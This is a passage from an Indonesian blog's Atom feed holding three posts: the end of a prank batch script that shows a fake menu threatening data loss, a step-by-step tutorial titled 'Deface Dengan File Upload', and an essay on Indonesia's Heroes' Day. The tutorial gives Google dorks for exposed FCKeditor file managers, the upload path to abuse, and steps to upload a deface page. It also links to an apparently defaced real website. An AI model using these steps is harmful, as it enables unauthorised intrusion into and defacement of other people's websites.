&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Ketik&amp;nbsp;kode:&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;@echo off&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;title The end of the world&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;cd C:\&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;:menu&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;cls&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;echo oops gw gak tanggung jawab lho apa yang barusan lu lakuin hehhe,,semuanya dh jadi tanggung jawab lu sendiri...&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;pause&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;echo pilih nama cwe yang lu suka =P :&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;echo 1. datanya bakal ilang lho.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;echo 2. komputer nya corrupt lho&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;echo 3. heheh no comment deh klo yang ini&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;echo 4. mau mati pake jalan ini?&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;echo 5. bye bye...&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;set input=nothing&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;set /p input=Choice:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;if %input%==1 goto one&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;if %input%==2 goto two&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Dari 9 kode Script diatas, sobat bisa kembangin dari 9 script digabung menjadi 1, Kemudian lihat hasilnya...??&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Wkwkwk ^_^&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/1007552808435612000/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/11/code-untuk-isengi-teman.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/1007552808435612000'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/1007552808435612000'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/11/code-untuk-isengi-teman.html' title='Code Untuk Isengi Teman'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-8790917495983106224</id><published>2012-11-30T03:32:00.000-08:00</published><updated>2013-01-24T05:53:56.779-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><title type='text'>Deface Dengan File Upload</title><content type='html'>&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2012/11/deface-dengan-teknik-remote-file-upload.html&quot;&gt;Deface dengan Teknik Remote File Upload Exploit Vulnerability&lt;/a&gt; | &lt;span style=&quot;color: red;&quot;&gt;Captain-Kid&lt;/span&gt; - Ngga ada habis-habisnya kalo ngebahas soal &lt;u&gt;hacking&lt;/u&gt;, Setiap hari berbagai macam exploit ditemukan. Dan sekarang saya akan share &lt;b&gt;cara deface website&lt;/b&gt;
sob. Tutorial ini saya dapat dari grup facebook Hacker Indonesia. 
Namun karena masih banyak yang bingung, disini saya akan jelaskan 
beserta gambarnya.&lt;br /&gt;
&lt;div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Kg8NixZ9EyLLPgAL1qFcuyQ7jSZxxnBkj2pQajbF5XZs6WYaMVkoeVSn7L4EXN20_0CqYJeYn3pe7JoGSYcWY9knbJ6Jp9-kDRI28MX1bxszC2Qj72xxtUxXlfVwsxCL9V-8xB0rjey4/s1600/images.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Kg8NixZ9EyLLPgAL1qFcuyQ7jSZxxnBkj2pQajbF5XZs6WYaMVkoeVSn7L4EXN20_0CqYJeYn3pe7JoGSYcWY9knbJ6Jp9-kDRI28MX1bxszC2Qj72xxtUxXlfVwsxCL9V-8xB0rjey4/s1600/images.jpg&quot; title=&quot;Deface dengan Teknik Remote File Upload Exploit Vulnerability&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;u&gt;We Are Anonymous !&lt;/u&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
Ok, daripada lama-lama cerita, mending kita langsung aja ketutorialnya sob, Berikut Tutorial&amp;nbsp;&lt;u&gt;Deface dengan Teknik Remote File Upload Exploit Vulnerability&lt;/u&gt; :&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;color: orange;&quot;&gt;Dork :&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
inurl:/editor/editor/filemanager/&lt;br /&gt;
inurl:/HTMLEditor/editor/&quot;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;span style=&quot;color: orange;&quot;&gt;1).&lt;/span&gt; Masukan salah satu dork diatas ke Seacrh Enginee Google.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNtb0DBTc4l7H8lDMWAOAVeuBAZPk19Qor2dN74nBVUmqQl1DzBbRRVt_InHNe-LzubAZXXWfKQRvTFCQe9eBhCM4-bb-sWRrL4d_EvosYyPDUir6uq9iUXq_CSxyOm-RG-L-27Q63JhSZ/s1600/Tadbir+CMS+1.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html&quot; border=&quot;0&quot; height=&quot;217&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNtb0DBTc4l7H8lDMWAOAVeuBAZPk19Qor2dN74nBVUmqQl1DzBbRRVt_InHNe-LzubAZXXWfKQRvTFCQe9eBhCM4-bb-sWRrL4d_EvosYyPDUir6uq9iUXq_CSxyOm-RG-L-27Q63JhSZ/s400/Tadbir+CMS+1.jpg&quot; title=&quot;Deface dengan Teknik Remote File Upload Exploit Vulnerability&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;color: orange;&quot;&gt;2).&lt;/span&gt; Pilih salah satu website sebagai target.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6Yy3LDOxFBzkmUKu89m-vwowTDLavaFb5hVahk5-wvLW-CT2mbUzdKWFK2QHbfrpWzu0V96f7OOf3o61ZalnOqcM-nLQOEfqAux4Yvnxgf4Eb-lPhEkLztL1PRh57TI9fu2blnO-TmxJ5/s1600/Tadbir+CMS+2.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html&quot; border=&quot;0&quot; height=&quot;223&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6Yy3LDOxFBzkmUKu89m-vwowTDLavaFb5hVahk5-wvLW-CT2mbUzdKWFK2QHbfrpWzu0V96f7OOf3o61ZalnOqcM-nLQOEfqAux4Yvnxgf4Eb-lPhEkLztL1PRh57TI9fu2blnO-TmxJ5/s400/Tadbir+CMS+2.jpg&quot; title=&quot;Deface dengan Teknik Remote File Upload Exploit Vulnerability&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;color: orange;&quot;&gt;3).&lt;/span&gt; Tampilan Webitenya nanti akan seperti ini.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq3O505CWlVwKEZHxXxKD_nDGWInfdPNiVrzRnPo7oM4OLovOUE0DId4VYBm93FZy3nNzCK8JIhUad5uifum3QQY3oUwAp7R1kXXFbxMjiaF-A7nk_Jl8xPxQEhI_FUuIF2_9ZW3jr3vUG/s1600/Tadbir+CMS+3.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html&quot; border=&quot;0&quot; height=&quot;207&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq3O505CWlVwKEZHxXxKD_nDGWInfdPNiVrzRnPo7oM4OLovOUE0DId4VYBm93FZy3nNzCK8JIhUad5uifum3QQY3oUwAp7R1kXXFbxMjiaF-A7nk_Jl8xPxQEhI_FUuIF2_9ZW3jr3vUG/s400/Tadbir+CMS+3.jpg&quot; title=&quot;Deface dengan Teknik Remote File Upload Exploit Vulnerability&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;color: orange;&quot;&gt;4).&lt;/span&gt; Kemudian kode ini :&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;i&gt;editor/editor/filemanager/browser/mcpuk/images/icons/32/&lt;/i&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;span style=&quot;color: orange;&quot;&gt;5).&lt;/span&gt; Ganti dengan kode ini, Lalu enter :&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;i&gt;editor/editor/filemanager/upload/test.html&lt;/i&gt;&lt;/blockquote&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRd2mvT6o7MBq62cEosCtRAjmreN5lf-oZOO_VmJmIwMRKnTICkjI2d2EafeN-F7E7GNBISrgautDEw9kx4dbimLigBZi8P_MORd7q0zIi7NVn1yQRo47chgNiD1zLKzxRwpNUwgCTxAwN/s1600/Tadbir+CMS+4.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html&quot; border=&quot;0&quot; height=&quot;210&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRd2mvT6o7MBq62cEosCtRAjmreN5lf-oZOO_VmJmIwMRKnTICkjI2d2EafeN-F7E7GNBISrgautDEw9kx4dbimLigBZi8P_MORd7q0zIi7NVn1yQRo47chgNiD1zLKzxRwpNUwgCTxAwN/s400/Tadbir+CMS+4.jpg&quot; title=&quot;Deface dengan Teknik Remote File Upload Exploit Vulnerability&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;color: orange;&quot;&gt;6).&lt;/span&gt; Jika sudah, kamu ubah pada Select the &lt;b&gt;&quot;File Uploader&quot; to use&lt;/b&gt;: Ubah dari &lt;b&gt;ASP&lt;/b&gt; menjadi &lt;b&gt;PHP&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: orange;&quot;&gt;7).&lt;/span&gt; Kemudian kamu klik &lt;b&gt;Choose File&lt;/b&gt;, kamu pilih salah satu file HTML deface&#39;an kamu.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLQ4iCPTlhIbkCRJhpzdSywlEsh69rBSzW0Yv4YBcdj81XTNkcrfhjzuTHv-xiYlM5_4jUPZyhMyoggqPykwdu-aOjuMFIvTj3xEbtSZHWY4TiEPo4sjREFN4s8UYPgEUQrTt6qcyAY0bQ/s1600/Tadbir+CMS+5.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html&quot; border=&quot;0&quot; height=&quot;216&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLQ4iCPTlhIbkCRJhpzdSywlEsh69rBSzW0Yv4YBcdj81XTNkcrfhjzuTHv-xiYlM5_4jUPZyhMyoggqPykwdu-aOjuMFIvTj3xEbtSZHWY4TiEPo4sjREFN4s8UYPgEUQrTt6qcyAY0bQ/s400/Tadbir+CMS+5.png&quot; title=&quot;Deface dengan Teknik Remote File Upload Exploit Vulnerability&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;color: orange;&quot;&gt;8).&lt;/span&gt; Lalu klik &lt;b&gt;Send it to the Server&lt;/b&gt;.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV3Yd8DA1mKSpaFfweKpV9euV6Lrt6GLMRKiIGSN_6py5Ja6gNfhS2WaCFUr115qi4tykrsAqYgsfTd2Xh_TPI8q1TP8r8NHWjy_kPzKKAmUcUBQoNpIRR5LFJ-a6Rfn80_ADx5YXBezEW/s1600/Tadbir+CMS+6.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html&quot; border=&quot;0&quot; height=&quot;197&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV3Yd8DA1mKSpaFfweKpV9euV6Lrt6GLMRKiIGSN_6py5Ja6gNfhS2WaCFUr115qi4tykrsAqYgsfTd2Xh_TPI8q1TP8r8NHWjy_kPzKKAmUcUBQoNpIRR5LFJ-a6Rfn80_ADx5YXBezEW/s400/Tadbir+CMS+6.jpg&quot; title=&quot;Deface dengan Teknik Remote File Upload Exploit Vulnerability&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;color: orange;&quot;&gt;9).&lt;/span&gt; Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( &lt;b&gt;Upload File URL&lt;/b&gt; ) akan memberikan patch dimana file kamu berada.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH-bNE0oWfhx-QYyNVrXSHVO6fEE9X3mHPqeYZtvnsIvhQlpKfVX2bBoaiGQNwKjANfIVf0Feg5lzkIQbC5l_G-TzqcEgKC4a-Zatisd3784OCMHmvy3_qB0XKwAWcLYw7RM1pEnnwIPvG/s1600/Tadbir+CMS+7.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html&quot; border=&quot;0&quot; height=&quot;206&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH-bNE0oWfhx-QYyNVrXSHVO6fEE9X3mHPqeYZtvnsIvhQlpKfVX2bBoaiGQNwKjANfIVf0Feg5lzkIQbC5l_G-TzqcEgKC4a-Zatisd3784OCMHmvy3_qB0XKwAWcLYw7RM1pEnnwIPvG/s400/Tadbir+CMS+7.jpg&quot; title=&quot;Deface dengan Teknik Remote File Upload Exploit Vulnerability&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;color: orange;&quot;&gt;10).&lt;/span&gt; Copykan saja file yang ada di&amp;nbsp;( &lt;b&gt;Upload File URL&lt;/b&gt; )&amp;nbsp;lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini :&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;a href=&quot;http://www.tysk.ee/failid/Image/idulfitri%281%29.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.tysk.ee/failid/Image/idulfitri(1).html&lt;/a&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: orange;&quot;&gt;Screenshot :&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1EboJNrbcrgAT5hjjeWMvw46OZVtpbIPjREItEVifKQAeZaFzFV48OwL0YcST1lLxxX19zLmNaUSITROveEoBS9mM6plXVWFEJznC4xocKGMJexZQ4ol7pniBZiOBlmtsPbXOWXwDHSey/s1600/Tadbir+CMS+8.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html&quot; border=&quot;0&quot; height=&quot;201&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1EboJNrbcrgAT5hjjeWMvw46OZVtpbIPjREItEVifKQAeZaFzFV48OwL0YcST1lLxxX19zLmNaUSITROveEoBS9mM6plXVWFEJznC4xocKGMJexZQ4ol7pniBZiOBlmtsPbXOWXwDHSey/s400/Tadbir+CMS+8.jpg&quot; title=&quot;Deface dengan Teknik Remote File Upload Exploit Vulnerability&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Cara sama dengan dengan tutorial yang pernah saya share dulu yaitu &lt;b&gt;&lt;u&gt;Cara Deface Website Melalui Spaw Uploads Vulnerability&lt;/u&gt;&lt;/b&gt;, hanya saja sedikit berbeda tampilan ketika kita akan mengupload file HMTL.&lt;br /&gt;
&lt;br /&gt;
Sekian postingan saya kali ini tentang&amp;nbsp;&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2012/11/deface-dengan-teknik-remote-file-upload.html&quot;&gt;Deface dengan Teknik Remote File Upload Exploit Vulnerability&lt;/a&gt;, semoga dapat bermanfaat untuk kalian semua.&lt;br /&gt;
&lt;br /&gt;
Sumber : http://cirebon-cyber4rt.blogspot.com/&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/8790917495983106224/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/11/deface-dengan-teknik-remote-file-upload.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/8790917495983106224'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/8790917495983106224'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/11/deface-dengan-teknik-remote-file-upload.html' title='Deface Dengan File Upload'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Kg8NixZ9EyLLPgAL1qFcuyQ7jSZxxnBkj2pQajbF5XZs6WYaMVkoeVSn7L4EXN20_0CqYJeYn3pe7JoGSYcWY9knbJ6Jp9-kDRI28MX1bxszC2Qj72xxtUxXlfVwsxCL9V-8xB0rjey4/s72-c/images.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-5509505619384998660</id><published>2012-11-09T18:57:00.000-08:00</published><updated>2012-11-09T18:59:07.703-08:00</updated><title type='text'>Menghormati Pahlawan</title><content type='html'>Bung Karno pernah menyatakan bahwa bangsa yang besar adalah bangsa &lt;br /&gt;
yang
 menghormati pehlawan-pahlawannya. Setiap tahun, tepatnya tanggal 10 
November kita memperingati dan merayakan hari itu sebagai Hari Pahlawan.
 Bisa juga dikatakan bahwa kegiatan itu merupakan salah satu bentuk 
penghormatan terhadap pahlawan-pahlawan yang telah mendahului kita, 
karena jasa-jasanya ikut merebut dan mempertahankan kemerdekaaan.
              Pada masa lalu pengertian 
pahlawan lebih sempit, karena hanya terbatas pada pahlawan sebagai 
pejuang yang pernah angkat senjata, bertempur atau berperang melawan 
penjajah. Pengertian lebih luas kemudian berkembang bahwa siapapun yang 
pernah berjasa kepada negara, entah ia orang militer atau sipil, 
semuanya dianggap pahlawan. Kita mengenal berpuluh-puluh pahlawan yang 
ditetapkan oleh negara dengan predikat Pahlawan Nasional. &lt;br /&gt;
&lt;br /&gt;
Deretan nama-nama Pahlawan Nasional dari sudut sejarahnya dimulai sejak 
jauh sebelum abad ke-20, hingga ke pertengahan abad ke-20 dalam berbagai
 lapangan perjuangan, selain tokoh-tokoh militer dan juga tokoh-tokoh 
pergerakan nasional yang berjuang dengan menggunakan berbagai media 
organisasi, baik organisasi sosial-budaya maupun politik (parpol), yang 
hasilnya adalah kemerdekaaan Indonesia pada tahun 1945.&lt;br /&gt;
&lt;br /&gt;
Pada tanggal 10 November 1945 di Surabaya pecah pertempuran 
besar-besaran antara rakyat (arek-arek Suroboyo) melawan tentara Sekutu 
yang diboncengi Belanda. Inilah keunikan Indonesia. Di banyak bangsa 
lain mereka terlebih dahulu melakukan pertempuran dan peperangan, 
setelah kekuatan kolonial dikalahkan, barulah mereka mencetuskan 
kemerdekaaan. &lt;br /&gt;
&lt;br /&gt;
Di negara kita, kita terlebih dahulu memproklamirkan kemerdekaaan, 
barulah kemudian pecah peperangan karena Belanda mengirimkan 
balatentaranya untuk merebut kembali tanah air kita agar mereka dapat 
menduduki (menjajah) kembali tanah air kita. Dengan demikian perang 
kemerdekaan Indonesia lebih banyak sebagai perjuangan untuk 
mempertahankan kemerdekaan yang telah diproklamirkan&lt;br /&gt;
&lt;br /&gt;
Proporsional&lt;br /&gt;
&lt;br /&gt;
Kembali ke masalah semula, bagaimana kita sebaiknya menghormati pahlawan
 secara proporsional dan tentu saja disesuaikan dengan perkembangan 
zaman baik masa kini maupun yang akan datang? Kita menyadari bahwa tanpa
 munculnya pahlawan-pahlawan itu, mustahil kita akan menghirup udara 
kemerdekaaan seperti sekarang ini. Meskipun para pahlawan itu sendiri 
tidak berkeinginan untuk dihormati dan juga tidak ada pamrih untuk 
memperoleh tanda-tanda jasa seperti bintang kehormatan dan lain 
sebagainya, kita tetap terus menghormati dan menghargai kepahlawanan 
mereka. Salah satu cara untuk menghormati mereka adalah dengan mewarisi 
semangat juang termasuk alam pikiran mereka yang memotivasi mereka untuk
 berjuang demi kepentingan bangsa dan tanah air. &lt;br /&gt;
&lt;br /&gt;
Pada tahun 1960-an Presiden AS, John F. Kennedy pernah mengucapkan 
pernyataannya yang terkenal: &quot;Jangan bertanya apa yang dapat negara 
berikan kepadamu, tapi bertanyalah apa yang dapat engkau persembahkan 
untuk negaramu.&quot; Dengan kata lain, perjuangan murni para pahlawan adalah
 tanpa pamrih, mereka lebih banyak memberi daripada menerima. Pemberian 
mereka untuk negara berupa pengorbanan waktu, mengesampingkan 
kepentingan pribadi, keluarga, kelompok atau golongannya. Mereka 
memberi, sekali lagi, hanya memberi. &lt;br /&gt;
&lt;br /&gt;
Mereka juga mengharapkan bukan pada negara, tapi pada kita sebagai ahli 
warisnya yang harus meneruskan estafeta perjuangan bangsa, baik untuk 
masa kini maupun masa yang akan datang. Para pahlawan itu mengharapkan 
akan terus lahir pahlawan-pahlawan baru dengan lapangan perjuangan yang 
bervariasi, sesuai dengan bidang dan keahlian masing-masing. &lt;br /&gt;
&lt;br /&gt;
Dengan dasar itu kita mengisi kemerdekaaan untuk membawa Indonesia 
sebagai negara yang lebih maju, memberikan perlindungan dan 
kesejahteraan kepada segenap rakyat, agar dapat hidup layak dan 
bermartabat sesuai dengan amanah Konstitusi. Dengan demikian maka setiap
